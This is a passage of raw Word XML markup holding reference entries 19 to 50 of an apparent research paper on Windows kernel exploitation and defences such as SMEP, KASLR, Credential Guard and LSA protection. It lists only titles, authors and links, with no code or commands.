    <w:p w14:paraId="79D2069E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[19] NCC Group Security Research, “CVE-2021-31956: Exploiting the Windows Kernel (NTFS with WNF),” 2021. [Online]. Available: https://www.nccgroup.com/researchblog/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954D828" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F53AA5" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[20] Safe Security, “Windows Win32k Elevation of Privilege Vulnerability,” 2023. [Online]. Available: https://safe.security/wp-content/uploads/windows-win32kelevation-of-privilege-vulnerability.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D783B0" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE3D62B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[21] I. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Korkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MemoryRanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Protecting Drivers from Kernel Attacks via Hypervisor-Based Monitoring,” *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arXiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>*, 2018. [Online]. Available: https://arxiv.org/pdf/1812.09920.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C2AA7" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331D2C40" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[22] A. Srivastava, A. Lanzi, and J. C. Mitchell, “Gateway: Monitoring Untrusted Kernel-Mode Execution,” NDSS Symposium, 2017. [Online]. Available: https://www.ndss-symposium.org/wp-content/uploads/2017/09/sriv.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01375617" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EE64BB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[23] Microsoft Security Research </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Understanding VBS and Credential Guard: Virtualization-Based Security,” 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B3280" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ED3244" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[24] C. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kalenberg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, X. Kovah, and J. Butterworth, “Extreme Privilege Escalation on Windows 8 UEFI Systems: SMM/Ring 0 Compromise,” Black Hat USA Whitepaper, 2014. [Online]. Available: https://blackhat.com/docs/us-14/materials/us14-Kallenberg-Extreme-Privilege-Escalation-On-Windows8-UEFI-SystemsWP.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE2568" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DDE44B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[25] Wiz.io Security Research, “CVE-2025-62215: Windows Kernel Race Condition Impact &amp; Mitigation,” 2025. [Online]. Available: https://www.wiz.io/vulnerabilitydatabase/cve/cve-2025-62215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328BDF19" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFA915B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[26] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SocPrime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Threat Research, “CVE-2025-62215: Microsoft Patches Windows Kernel Zero-Day,” 2025. [Online]. Available: https://socprime.com/blog/latestthreats/cve-2025-62215-windows-kernel-vulnerability/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A730A4" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E01E296" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[27] Microsoft Security Blog, “Exploitation of CLFS Zero Day (CVE-2025-29824) Leads to Ransomware Activity,” 2025. [Online]. Available: https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitationof-clfs-zero-day-leads-to-ransomware-activity/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E7AA0" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0892EF58" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[28] C. McGarr, “Token Stealing Payloads Revisited on Windows 10 x64: x64 Kernel Shellcode and SMEP Bypass,” 2020. [Online]. Available: https://connormcgarr.github.io/x64-Kernel-Shellcode-Revisited-and-SMEP Bypass/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4C4AF" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542A2C83" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[29] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XPNSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Research, “Exploiting Windows 10 Kernel Drivers: Stack Overflow,” 2018. [Online]. Available: https://blog.xpnsec.com/hevd-stackoverflow/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA8D9B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5717625A" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[30] Fluid Attacks Security Research, “HEVD: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kASLR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + SMEP Bypass Demonstration,” 2025. [Online]. Available: https://fluidattacks.com/blog/hevd-smep-bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724F807" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204BFC83" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[31] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “Development of a New Windows 10 KASLR Bypass (in One </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Command),” 2020. [Online]. Available: https://www.offsec.com/blog/developmentof-a-new-windows-10-kaslr-bypass-in-one-windbg-command/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E22EA82" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8B4A8E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[32] Core Security, “Windows SMEP Bypass,” 2020. [Online]. Available: https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7EE72" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1943627C" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[33] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Silverfort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Research, “CVE-2025-60704: Windows Kerberos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CheckSum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Vulnerability-Critical Domain Compromise,” 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4925E512" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD1BBF4" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[34] Microsoft Security Updates, “CVE-2024-20674: Windows Kerberos Security Feature Bypass-Critical Rating,” 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224665F" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4977FF1C" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[35] Microsoft Security Bulletin, “MS16-014: Important Security Update,” 2016. [Online]. Available: https://learn.microsoft.com/en-us/securityupdates/securitybulletins/2016/ms16-014</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82C2A6" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02720CE3" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[36] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JumpCloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “What is the Local Security Authority (LSA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)?,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>” 2025. [Online]. Available: https://jumpcloud.com/it-index/what-is-the-local-securityauthority-lsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6504E1" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A791037" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[37] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lepide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “Why You Should Enable LSA Protection: Protected Process Light (PPL) Mechanisms,” 2025. [Online]. Available: https://www.lepide.com/blog/whyy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11701514" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-should-enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-protection/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E566ED" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AA5096" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[38] Rackspace Security Documentation, “Windows LSA Spoofing Vulnerability CVE-2022-26925,” 2022. [Online]. Available: https://docs.rackspace.com/docs/windowslsa-spoofing-vulnerability-cve-2022-26925</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE27710" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFE8239" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[39] Team Hydra Security Research, “Bypassing Credential Guard: Memory Patching Techniques,” 2020. [Online]. Available: https://teamhydra.blog/2020/08/25/bypassingcredential-guard/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD67D47" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4190EBF4" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[40] Elastic Security, “How Attackers Abuse Access Token Manipulation (ATT&amp;CK T1134),” 2025. [Online]. Available: https://www.elastic.co/blog/how-attackersabuse-access-token-manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8BD7D" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4A5A0D" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[41] S. El-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sherei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Demystifying Windows Kernel Exploitation,” DEF CON 25, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D5F17" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E5E24E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[42] Google Security Research, “Identifying and Exploiting Windows Kernel Race Conditions,” 2013. [Online]. Available: https://research.google.com/pubs/archive/42189.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2781DB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AD9F3F" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[43] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SocPrime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Threat Intelligence, “CVE-2024-1086: Critical Privilege Escalation in Kernel Memory Management,” 2025. [Online]. Available: https://socprime.com/blog/cve-2024-1086-vulnerability/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C33B49" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C61BB0" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[44] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PCUnlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Development Team, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PCUnlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: UEFI Exit Boot Services Hook Implementation,” 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4821034E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3588B568" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[45] Kon-Boot Development Team, “Kon-Boot: Legacy Int 13h Hook &amp; UEFI Shim Implementation,” 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A42A1A" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF000B0" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[46] CrowdStrike Falcon Labs, “CrowdStrike Falcon Prevents Vulnerable Driver Attacks,” 2024. [Online]. Available: https://www.crowdstrike.com/enus/blog/falcon-prevents-vulnerable-driver-attacks-real-world-intrusion/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57203B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7C2511" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[47] Red Canary Threat Detection, “OS Credential Dumping-Threat Detection Report &amp; Techniques,” 2025. [Online]. Available: https://redcanary.com/threatdetection-report/techniques/os-credential-dumping/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6C868" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5162FF58" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[48] Trend Micro Security Research, “An In-Depth Look at Windows Kernel Threats,” 2020. [Online]. Available: https://documents.trendmicro.com/assets/white_papers/wpan-in-depth-look-at-windows-kernel-threats.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEAAA55" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E957724" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[49] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Apriorit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “Mitigate DLL Injection Attacks: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Mechanisms,” 2025. [Online]. Available: https://www.apriorit.com/dev-blog/secure-windowssoftware-against-dll-attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17086803" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388AFCF4" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[50] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SentinelOne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Labs, “Case Study: Why You Shouldn’t Trust NTDLL from Kernel Image Load Callbacks,” 2021. [Online]. Available: https://www.sentinelone.com/labs/casestudy-why-you-shouldnt-trust-ntdll-from-kernel-image-load-callbacks/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716E984" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550954BA" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
